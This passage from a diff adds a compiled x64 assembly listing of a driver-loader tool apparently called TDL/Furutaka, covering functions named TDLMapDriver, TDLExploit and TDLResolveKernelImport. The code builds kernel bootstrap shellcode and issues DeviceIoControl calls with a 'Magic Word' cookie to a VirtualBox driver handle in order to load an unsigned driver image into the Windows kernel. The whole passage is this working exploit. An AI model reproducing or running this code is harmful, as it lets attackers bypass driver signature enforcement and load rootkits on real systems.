+ mov DWORD PTR [rsp+32], 12288 ; 00003000H
+ lea rdx, QWORD PTR Buffer$[rbp-256]
+ or rcx, -1
+ call QWORD PTR __imp_NtAllocateVirtualMemory
+; Line 419
+ cmp QWORD PTR Buffer$[rbp-256], r13
+ jne SHORT $LN21@TDLMapDriv
+; Line 420
+ mov edx, edi
+ lea rcx, OFFSET FLAT:??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@
+; Line 421
+ jmp $LN33@TDLMapDriv
+$LN20@TDLMapDriv:
+; Line 406
+ mov edx, edi
+ lea rcx, OFFSET FLAT:??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@
+; Line 407
+ jmp $LN33@TDLMapDriv
+$LN17@TDLMapDriv:
+; Line 394
+ mov edx, edi
+ lea rcx, OFFSET FLAT:??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@
+; Line 395
+ jmp $LN33@TDLMapDriv
+$LN21@TDLMapDriv:
+; Line 424
+ lea rdx, OFFSET FLAT:??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strcpy_w
+; Line 425
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strend_w
+ mov rcx, QWORD PTR Buffer$[rbp-256]
+ mov rdx, rax
+ call u64tohex_w
+; Line 426
+ mov edx, edi
+ lea rcx, QWORD PTR text$[rbp-256]
+ call cuiPrintTextW
+; Line 433
+ mov rax, QWORD PTR Buffer$[rbp-256]
+; Line 435
+ mov rcx, rbx
+ mov BYTE PTR [rax], 72 ; 00000048H
+ mov rax, QWORD PTR Buffer$[rbp-256]
+ mov BYTE PTR [rax+1], 185 ; 000000b9H
+ sub rcx, QWORD PTR KernelImage$[rbp-256]
+ mov rax, QWORD PTR Buffer$[rbp-256]
+ add rcx, QWORD PTR xExAllocatePoolWithTag$[rsp]
+ mov QWORD PTR [rax+2], rcx
+; Line 438
+ mov eax, DWORD PTR g_NtBuildNumber
+ cmp eax, r14d
+ jae SHORT $LN23@TDLMapDriv
+; Line 439
+ mov rax, QWORD PTR Buffer$[rbp-256]
+; Line 441
+ mov rcx, rbx
+; Line 448
+ mov r14d, 798 ; 0000031eH
+ mov BYTE PTR [rax+10], 72 ; 00000048H
+ mov rax, QWORD PTR Buffer$[rbp-256]
+ mov BYTE PTR [rax+11], 186 ; 000000baH
+ sub rcx, QWORD PTR KernelImage$[rbp-256]
+ add rcx, QWORD PTR xPsCreateSystemThread$[rsp]
+ mov rax, QWORD PTR Buffer$[rbp-256]
+ mov QWORD PTR [rax+12], rcx
+ mov rcx, rbx
+ mov rax, QWORD PTR Buffer$[rbp-256]
+ mov BYTE PTR [rax+20], 73 ; 00000049H
+ mov rax, QWORD PTR Buffer$[rbp-256]
+ mov BYTE PTR [rax+21], 184 ; 000000b8H
+ sub rcx, QWORD PTR KernelImage$[rbp-256]
+ mov rax, QWORD PTR Buffer$[rbp-256]
+ add rcx, QWORD PTR xZwClose$[rsp]
+ mov QWORD PTR [rax+22], rcx
+ mov ecx, 30
+; Line 449
+ mov eax, DWORD PTR g_NtBuildNumber
+ jmp SHORT $LN24@TDLMapDriv
+$LN23@TDLMapDriv:
+; Line 451
+ mov ecx, 10
+ mov r14d, 778 ; 0000030aH
+$LN24@TDLMapDriv:
+; Line 456
+ add rcx, QWORD PTR Buffer$[rbp-256]
+ mov edx, 128 ; 00000080H
+ cmp eax, 15063 ; 00003ad7H
+ jae $LN25@TDLMapDriv
+; Line 457
+ lea rax, OFFSET FLAT:TDLBootstrapLoader_code
+ lea edi, QWORD PTR [rdx-125]
+$LL32@TDLMapDriv:
+ movups xmm0, XMMWORD PTR [rax]
+ movups XMMWORD PTR [rcx], xmm0
+ movups xmm1, XMMWORD PTR [rax+16]
+ movups XMMWORD PTR [rcx+16], xmm1
+ movups xmm0, XMMWORD PTR [rax+32]
+ movups XMMWORD PTR [rcx+32], xmm0
+ movups xmm1, XMMWORD PTR [rax+48]
+ movups XMMWORD PTR [rcx+48], xmm1
+ movups xmm0, XMMWORD PTR [rax+64]
+ movups XMMWORD PTR [rcx+64], xmm0
+ movups xmm1, XMMWORD PTR [rax+80]
+ movups XMMWORD PTR [rcx+80], xmm1
+ movups xmm0, XMMWORD PTR [rax+96]
+ movups XMMWORD PTR [rcx+96], xmm0
+ add rcx, rdx
+ movups xmm1, XMMWORD PTR [rax+112]
+ add rax, rdx
+ movups XMMWORD PTR [rcx-16], xmm1
+ sub rdi, 1
+ jne SHORT $LL32@TDLMapDriv
+ movups xmm0, XMMWORD PTR [rax]
+; Line 460
+ mov edi, 1
+ movups XMMWORD PTR [rcx], xmm0
+ movups xmm1, XMMWORD PTR [rax+16]
+ movups XMMWORD PTR [rcx+16], xmm1
+ movups xmm0, XMMWORD PTR [rax+32]
+ movups XMMWORD PTR [rcx+32], xmm0
+ movups xmm1, XMMWORD PTR [rax+48]
+ movups XMMWORD PTR [rcx+48], xmm1
+ movups xmm0, XMMWORD PTR [rax+64]
+ movups XMMWORD PTR [rcx+64], xmm0
+ movups xmm1, XMMWORD PTR [rax+80]
+ movups XMMWORD PTR [rcx+80], xmm1
+ lea rcx, OFFSET FLAT:??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@
+ jmp SHORT $LN26@TDLMapDriv
+$LN25@TDLMapDriv:
+; Line 462
+ lea rax, OFFSET FLAT:TDLBootstrapLoader_code_w10rs2
+$LL31@TDLMapDriv:
+ movups xmm0, XMMWORD PTR [rax]
+ movups XMMWORD PTR [rcx], xmm0
+ movups xmm1, XMMWORD PTR [rax+16]
+ movups XMMWORD PTR [rcx+16], xmm1
+ movups xmm0, XMMWORD PTR [rax+32]
+ movups XMMWORD PTR [rcx+32], xmm0
+ movups xmm1, XMMWORD PTR [rax+48]
+ movups XMMWORD PTR [rcx+48], xmm1
+ movups xmm0, XMMWORD PTR [rax+64]
+ movups XMMWORD PTR [rcx+64], xmm0
+ movups xmm1, XMMWORD PTR [rax+80]
+ movups XMMWORD PTR [rcx+80], xmm1
+ movups xmm0, XMMWORD PTR [rax+96]
+ movups XMMWORD PTR [rcx+96], xmm0
+ add rcx, rdx
+ movups xmm1, XMMWORD PTR [rax+112]
+ add rax, rdx
+ movups XMMWORD PTR [rcx-16], xmm1
+ sub rsi, rdi
+ jne SHORT $LL31@TDLMapDriv
+ movups xmm0, XMMWORD PTR [rax]
+ movups XMMWORD PTR [rcx], xmm0
+ movups xmm1, XMMWORD PTR [rax+16]
+ movups XMMWORD PTR [rcx+16], xmm1
+ movups xmm0, XMMWORD PTR [rax+32]
+ movups XMMWORD PTR [rcx+32], xmm0
+ movups xmm1, XMMWORD PTR [rax+48]
+ movups XMMWORD PTR [rcx+48], xmm1
+ mov al, BYTE PTR [rax+64]
+ mov BYTE PTR [rcx+64], al
+; Line 464
+ lea rcx, OFFSET FLAT:??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@
+$LN26@TDLMapDriv:
+; Line 467
+ mov edx, edi
+ call cuiPrintTextW
+ mov rcx, QWORD PTR Buffer$[rbp-256]
+ mov r8, r12
+ mov rdx, QWORD PTR Image$[rsp]
+ mov edi, r14d
+ add rcx, rdi
+ call memcpy
+; Line 469
+ mov esi, 1
+ lea rcx, OFFSET FLAT:??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@
+ mov edx, esi
+ call cuiPrintTextW
+; Line 470
+ mov rcx, QWORD PTR Buffer$[rbp-256]
+ mov r8, rbx
+ mov rdx, QWORD PTR KernelImage$[rbp-256]
+ add rcx, rdi
+ call TDLResolveKernelImport
+; Line 472
+ mov edx, esi
+ lea rcx, OFFSET FLAT:??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@
+ call cuiPrintTextW
+; Line 473
+ mov rcx, QWORD PTR Buffer$[rbp-256]
+ lea edx, DWORD PTR [r12+4096]
+ mov r8d, r14d
+ call TDLExploit
+; Line 474
+ mov r15d, r13d
+; Line 475
+ jmp SHORT $LN3@TDLMapDriv
+$LN13@TDLMapDriv:
+; Line 381
+ mov edx, edi
+ lea rcx, OFFSET FLAT:??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@
+; Line 382
+ jmp SHORT $LN33@TDLMapDriv
+$LN10@TDLMapDriv:
+; Line 369
+ mov edx, edi
+ lea rcx, OFFSET FLAT:??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@
+; Line 370
+ jmp SHORT $LN33@TDLMapDriv
+$LN6@TDLMapDriv:
+; Line 349
+ mov edx, r12d
+ lea rcx, OFFSET FLAT:??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@
+$LN33@TDLMapDriv:
+; Line 478
+ call cuiPrintTextW
+$LN3@TDLMapDriv:
+ cmp QWORD PTR Buffer$[rbp-256], r13
+ je SHORT $LN27@TDLMapDriv
+; Line 480
+ mov r9d, 32768 ; 00008000H
+ mov QWORD PTR memIO$[rsp], r13
+ lea r8, QWORD PTR memIO$[rsp]
+ or rcx, -1
+ lea rdx, QWORD PTR Buffer$[rbp-256]
+ call QWORD PTR __imp_NtFreeVirtualMemory
+$LN27@TDLMapDriv:
+; Line 484
+ mov rbx, QWORD PTR [rsp+704]
+ mov eax, r15d
+ add rsp, 640 ; 00000280H
+ pop r15
+ pop r14
+ pop r13
+ pop r12
+ pop rdi
+ pop rsi
+ pop rbp
+ ret 0
+TDLMapDriver ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT TDLExploit
+_TEXT SEGMENT
+pLoadTask$ = 64
+memIO$ = 72
+Cookie$ = 80
+vmFast$ = 136
+ldrFree$ = 168
+paramOut$ = 200
+OpenLdr$ = 208
+text$ = 272
+Shellcode$ = 832
+CodeSize$ = 840
+DataOffset$ = 848
+bytesIO$ = 856
+TDLExploit PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 159
+$LN26:
+ mov rax, rsp
+ mov QWORD PTR [rax+8], rbx
+ mov QWORD PTR [rax+16], rsi
+ mov QWORD PTR [rax+24], rdi
+ push rbp
+ push r12
+ push r13
+ push r14
+ push r15
+ lea rbp, QWORD PTR [rax-568]
+ sub rsp, 784 ; 00000310H
+; Line 171
+ mov r10, QWORD PTR g_hVBox
+ xor r13d, r13d
+ mov r12d, r8d
+ mov r15, rcx
+ mov esi, edx
+ mov DWORD PTR bytesIO$[rbp-256], r13d
+ mov QWORD PTR pLoadTask$[rsp], r13
+ cmp r10, -1
+ je $LN13@TDLExploit
+; Line 180
+ movups xmm0, XMMWORD PTR ??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ xor eax, eax
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 182
+ mov QWORD PTR [rsp+56], r13
+ lea r9d, QWORD PTR [r13+48]
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ lea rdi, QWORD PTR Cookie$[rsp]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 182
+ lea r8, QWORD PTR Cookie$[rsp]
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ lea edx, QWORD PTR [rax+56]
+ mov ecx, edx
+ rep stosb
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 182
+ lea rax, QWORD PTR bytesIO$[rbp-256]
+ mov DWORD PTR Cookie$[rsp+12], edx
+ mov QWORD PTR [rsp+48], rax
+ mov rcx, r10
+ mov DWORD PTR [rsp+40], edx
+ lea rax, QWORD PTR Cookie$[rsp]
+ mov edx, 2261508 ; 00228204H
+ mov QWORD PTR [rsp+32], rax
+ mov DWORD PTR Cookie$[rsp], 1769107316 ; 69726f74H
+ mov DWORD PTR Cookie$[rsp+8], r9d
+ mov QWORD PTR Cookie$[rsp+16], 1107296322 ; 42000042H
+ mov DWORD PTR Cookie$[rsp+40], r13d
+ mov DWORD PTR Cookie$[rsp+44], 458754 ; 00070002H
+ movdqu XMMWORD PTR Cookie$[rsp+24], xmm0
+ call QWORD PTR __imp_DeviceIoControl
+ test eax, eax
+ jne SHORT $LN4@TDLExploit
+; Line 186
+ lea rcx, OFFSET FLAT:??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+$LN24@TDLExploit:
+; Line 301
+ mov edx, 1
+$LN23@TDLExploit:
+ call cuiPrintTextW
+ jmp $LN3@TDLExploit
+$LN4@TDLExploit:
+; Line 198
+ movsd xmm0, QWORD PTR ??_C@_08EFILHJLF@furutaka@
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ lea rdi, QWORD PTR OpenLdr$[rbp-256]
+ xor eax, eax
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 200
+ mov QWORD PTR [rsp+56], r13
+ lea r8, QWORD PTR OpenLdr$[rbp-256]
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ lea edx, QWORD PTR [rax+64]
+ mov ecx, edx
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 200
+ mov r9d, edx
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ rep stosb
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 191
+ mov eax, DWORD PTR Cookie$[rsp+24]
+; Line 194
+ lea ecx, QWORD PTR [rdx-24]
+ mov DWORD PTR OpenLdr$[rbp-256], eax
+ mov eax, DWORD PTR Cookie$[rsp+28]
+ mov DWORD PTR OpenLdr$[rbp-252], eax
+; Line 198
+ mov al, BYTE PTR ??_C@_08EFILHJLF@furutaka@+8
+ mov BYTE PTR OpenLdr$[rbp-220], al
+; Line 200
+ lea rax, QWORD PTR bytesIO$[rbp-256]
+ mov QWORD PTR [rsp+48], rax
+ lea rax, QWORD PTR OpenLdr$[rbp-256]
+ mov DWORD PTR [rsp+40], ecx
+ mov DWORD PTR OpenLdr$[rbp-248], edx
+ mov edx, 2261524 ; 00228214H
+ mov DWORD PTR OpenLdr$[rbp-244], ecx
+ mov rcx, QWORD PTR g_hVBox
+ mov QWORD PTR [rsp+32], rax
+ mov QWORD PTR OpenLdr$[rbp-240], 1107296322 ; 42000042H
+ mov DWORD PTR OpenLdr$[rbp-232], esi
+ movsd QWORD PTR OpenLdr$[rbp-228], xmm0
+ call QWORD PTR __imp_DeviceIoControl
+ test eax, eax
+ jne SHORT $LN5@TDLExploit
+; Line 204
+ lea rcx, OFFSET FLAT:??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+; Line 205
+ jmp $LN24@TDLExploit
+$LN5@TDLExploit:
+; Line 208
+ lea rdx, OFFSET FLAT:??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strcpy_w
+; Line 209
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strend_w
+ mov rcx, QWORD PTR OpenLdr$[rbp-232]
+ mov rdx, rax
+ call u64tohex_w
+; Line 210
+ mov ebx, 1
+ lea rcx, QWORD PTR text$[rbp-256]
+ mov edx, ebx
+ call cuiPrintTextW
+; Line 213
+ mov r14, QWORD PTR OpenLdr$[rbp-232]
+; Line 215
+ lea rax, QWORD PTR [rsi+4096]
+; Line 216
+ mov DWORD PTR [rsp+40], 4
+ lea r9, QWORD PTR memIO$[rsp]
+ xor r8d, r8d
+ mov QWORD PTR memIO$[rsp], rax
+ lea rdx, QWORD PTR pLoadTask$[rsp]
+ mov DWORD PTR [rsp+32], 12288 ; 00003000H
+ or rcx, -1
+ call QWORD PTR __imp_NtAllocateVirtualMemory
+; Line 219
+ mov rcx, QWORD PTR pLoadTask$[rsp]
+ test rcx, rcx
+ je $LN12@TDLExploit
+; Line 222
+ mov eax, DWORD PTR Cookie$[rsp+24]
+; Line 235
+ mov r8, rsi
+ mov DWORD PTR [rcx], eax
+ mov rdx, r15
+ mov rcx, QWORD PTR pLoadTask$[rsp]
+ mov eax, DWORD PTR Cookie$[rsp+28]
+ mov DWORD PTR [rcx+4], eax
+ lea ecx, DWORD PTR [rsi+104]
+ mov rax, QWORD PTR pLoadTask$[rsp]
+ mov DWORD PTR [rax+8], ecx
+ mov rax, QWORD PTR pLoadTask$[rsp]
+ mov DWORD PTR [rax+12], 24
+ mov rax, QWORD PTR pLoadTask$[rsp]
+ mov DWORD PTR [rax+16], 1107296322 ; 42000042H
+ mov rax, QWORD PTR pLoadTask$[rsp]
+ mov DWORD PTR [rax+20], r13d
+ mov rax, QWORD PTR pLoadTask$[rsp]
+ mov DWORD PTR [rax+80], ebx
+ mov rax, QWORD PTR pLoadTask$[rsp]
+ mov QWORD PTR [rax+72], r14
+ mov rax, QWORD PTR pLoadTask$[rsp]
+ mov QWORD PTR [rax+40], 106496 ; 0001a000H
+ mov rax, QWORD PTR pLoadTask$[rsp]
+ mov QWORD PTR [rax+64], r14
+ mov rax, QWORD PTR pLoadTask$[rsp]
+ mov QWORD PTR [rax+56], r14
+ mov rax, QWORD PTR pLoadTask$[rsp]
+ mov QWORD PTR [rax+48], r14
+ mov rcx, QWORD PTR pLoadTask$[rsp]
+ add rcx, 104 ; 00000068H
+ call memcpy
+; Line 236
+ mov rax, QWORD PTR pLoadTask$[rsp]
+; Line 238
+ lea r15d, QWORD PTR [rbx+23]
+ mov QWORD PTR [rsp+56], r13
+ mov edx, 2261528 ; 00228218H
+ mov DWORD PTR [rax+100], esi
+ lea rax, QWORD PTR bytesIO$[rbp-256]
+ mov r8, QWORD PTR pLoadTask$[rsp]
+ mov rcx, QWORD PTR g_hVBox
+ mov QWORD PTR [rsp+48], rax
+ mov DWORD PTR [rsp+40], r15d
+ mov r9d, DWORD PTR [r8+8]
+ mov QWORD PTR [rsp+32], r8
+ call QWORD PTR __imp_DeviceIoControl
+ test eax, eax
+ jne SHORT $LN8@TDLExploit
+; Line 242
+ mov edx, ebx
+ lea rcx, OFFSET FLAT:??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+; Line 243
+ jmp $LN23@TDLExploit
+$LN8@TDLExploit:
+; Line 246
+ lea rdx, OFFSET FLAT:??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strcpy_w
+; Line 247
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strend_w
+ mov rdx, rax
+ mov rcx, r14
+ call u64tohex_w
+; Line 248
+ lea rdx, OFFSET FLAT:??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strcat_w
+; Line 249
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strend_w
+ mov rdx, rax
+ mov ecx, esi
+ call ultohex_w
+; Line 251
+ lea rdx, OFFSET FLAT:??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strcat_w
+; Line 252
+ lea rcx, QWORD PTR text$[rbp-256]
+ call _strend_w
+ mov rdx, rax
+ lea rcx, QWORD PTR [r14+r12]
+ call u64tohex_w
+; Line 253
+ mov edx, ebx
+ lea rcx, QWORD PTR text$[rbp-256]
+ call cuiPrintTextW
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ xor eax, eax
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 265
+ mov QWORD PTR [rsp+56], r13
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ lea rdi, QWORD PTR vmFast$[rbp-256]
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 265
+ mov edx, 2261580 ; 0022824cH
+ lea r8, QWORD PTR vmFast$[rbp-256]
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ lea r12d, QWORD PTR [rax+32]
+ mov ecx, r12d
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 265
+ mov r9d, r12d
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ rep stosb
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 257
+ mov eax, DWORD PTR Cookie$[rsp+24]
+; Line 265
+ mov rcx, QWORD PTR g_hVBox
+ mov DWORD PTR vmFast$[rbp-256], eax
+ mov eax, DWORD PTR Cookie$[rsp+28]
+ mov DWORD PTR vmFast$[rbp-252], eax
+ lea rax, QWORD PTR bytesIO$[rbp-256]
+ mov QWORD PTR [rsp+48], rax
+ lea rax, QWORD PTR vmFast$[rbp-256]
+ mov DWORD PTR [rsp+40], r15d
+ mov QWORD PTR [rsp+32], rax
+ mov QWORD PTR vmFast$[rbp-240], 1107296322 ; 42000042H
+ mov DWORD PTR vmFast$[rbp-248], r12d
+ mov DWORD PTR vmFast$[rbp-244], r15d
+ mov QWORD PTR vmFast$[rbp-232], 106496 ; 0001a000H
+ call QWORD PTR __imp_DeviceIoControl
+ mov edx, ebx
+ test eax, eax
+ jne SHORT $LN10@TDLExploit
+; Line 269
+ lea rcx, OFFSET FLAT:??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+; Line 270
+ jmp $LN23@TDLExploit
+$LN10@TDLExploit:
+; Line 273
+ lea rcx, OFFSET FLAT:??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+ call cuiPrintTextW
+; Line 276
+ mov edx, ebx
+ lea rcx, OFFSET FLAT:??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+ call cuiPrintTextW
+; Line 279
+ mov rcx, QWORD PTR g_hVBox
+ lea rax, QWORD PTR bytesIO$[rbp-256]
+ mov QWORD PTR [rsp+56], r13
+ xor r9d, r9d
+ mov QWORD PTR [rsp+48], rax
+ xor r8d, r8d
+ lea rax, QWORD PTR paramOut$[rbp-256]
+ mov DWORD PTR [rsp+40], 8
+ mov edx, 2261771 ; 0022830bH
+ mov QWORD PTR [rsp+32], rax
+ mov QWORD PTR paramOut$[rbp-256], r13
+ call QWORD PTR __imp_DeviceIoControl
+; Line 283
+ mov edx, ebx
+ lea rcx, OFFSET FLAT:??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
+ call cuiPrintTextW
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ xor eax, eax
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 294
+ mov QWORD PTR [rsp+56], r13
+; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
+; Line 20225
+ mov rcx, r12
+ lea rdi, QWORD PTR ldrFree$[rbp-256]
+ rep stosb
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 286
+ mov eax, DWORD PTR Cookie$[rsp+24]
+; Line 294
+ lea r8, QWORD PTR ldrFree$[rbp-256]
+ mov rcx, QWORD PTR g_hVBox
+ mov r9d, r12d
+ mov DWORD PTR ldrFree$[rbp-256], eax
+ mov edx, 2261532 ; 0022821cH
+ mov eax, DWORD PTR Cookie$[rsp+28]
+ mov DWORD PTR ldrFree$[rbp-252], eax
+ lea rax, QWORD PTR bytesIO$[rbp-256]
+ mov QWORD PTR [rsp+48], rax
+ lea rax, QWORD PTR ldrFree$[rbp-256]
+ mov DWORD PTR [rsp+40], r15d
+ mov QWORD PTR [rsp+32], rax
+ mov DWORD PTR ldrFree$[rbp-248], r12d
+ mov DWORD PTR ldrFree$[rbp-244], r15d
+ mov QWORD PTR ldrFree$[rbp-240], 1107296322 ; 42000042H
+ mov QWORD PTR ldrFree$[rbp-232], r14
+ call QWORD PTR __imp_DeviceIoControl
+$LN3@TDLExploit:
+; Line 301
+ cmp QWORD PTR pLoadTask$[rsp], r13
+ je SHORT $LN12@TDLExploit
+; Line 303
+ mov r9d, 32768 ; 00008000H
+ mov QWORD PTR memIO$[rsp], r13
+ lea r8, QWORD PTR memIO$[rsp]
+ or rcx, -1
+ lea rdx, QWORD PTR pLoadTask$[rsp]
+ call QWORD PTR __imp_NtFreeVirtualMemory
+$LN12@TDLExploit:
+; Line 306
+ mov rcx, QWORD PTR g_hVBox
+ cmp rcx, -1
+ je SHORT $LN13@TDLExploit
+; Line 307
+ call QWORD PTR __imp_CloseHandle
+; Line 308
+ or QWORD PTR g_hVBox, -1
+$LN13@TDLExploit:
+; Line 310
+ lea r11, QWORD PTR [rsp+784]
+ mov rbx, QWORD PTR [r11+48]
+ mov rsi, QWORD PTR [r11+56]
+ mov rdi, QWORD PTR [r11+64]
+ mov rsp, r11
+ pop r15
+ pop r14
+ pop r13
+ pop r12
+ pop rbp
+ ret 0
+TDLExploit ENDP
+_TEXT ENDS
+; Function compile flags: /Ogspy
+; COMDAT TDLResolveKernelImport
+_TEXT SEGMENT
+Image$ = 80
+KernelImage$ = 88
+KernelBase$ = 96
+TDLResolveKernelImport PROC ; COMDAT
+; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
+; Line 111
+$LN19:
+ mov QWORD PTR [rsp+8], rbx
+ mov QWORD PTR [rsp+16], rbp
+ mov QWORD PTR [rsp+24], rsi
+ push rdi
+ push r12
+ push r13
+ push r14
+ push r15
+ sub rsp, 32 ; 00000020H
+ mov r12, r8
+ mov r13, rdx
+ mov rbx, rcx
+; Line 119
+ call QWORD PTR __imp_RtlImageNtHeader
+; Line 121
+ cmp DWORD PTR [rax+132], 1
+ jbe SHORT $LN3@TDLResolve
+; Line 124
+ mov edi, DWORD PTR [rax+144]
+; Line 125
+ test rdi, rdi
+ je SHORT $LN3@TDLResolve
+; Line 130
+ mov eax, DWORD PTR [rdi+rbx]
+ test eax, eax
+ jne SHORT $LN8@TDLResolve
+; Line 131
+ mov eax, DWORD PTR [rdi+rbx+16]
+$LN8@TDLResolve:
+; Line 135
+ mov esi, eax
+ add rsi, rbx
+ xor ebp, ebp
+ jmp SHORT $LN17@TDLResolve
+$LL4@TDLResolve:
+; Line 136
+ mov r15d, DWORD PTR [rdi+rbx+16]
+; Line 137
+ add r15, rbx
+ test rcx, rcx
+ js SHORT $LN9@TDLResolve
+; Line 139
+ lea r8, QWORD PTR [rbx+2]
+ add r8, rcx
+; Line 140
+ jmp SHORT $LN2@TDLResolve
+$LN9@TDLResolve:
+; Line 142
+ movzx r8d, cx
+$LN2@TDLResolve:
+; Line 135
+ mov rdx, r13
+ mov rcx, r12
+ call TDLGetProcAddress
+ mov QWORD PTR [r15+rbp*8], rax
+ inc ebp
+ add rsi, 8
+$LN17@TDLResolve:
+ mov rcx, QWORD PTR [rsi]
+ test rcx, rcx
+ jne SHORT $LL4@TDLResolve
+$LN3@TDLResolve:
+; Line 144
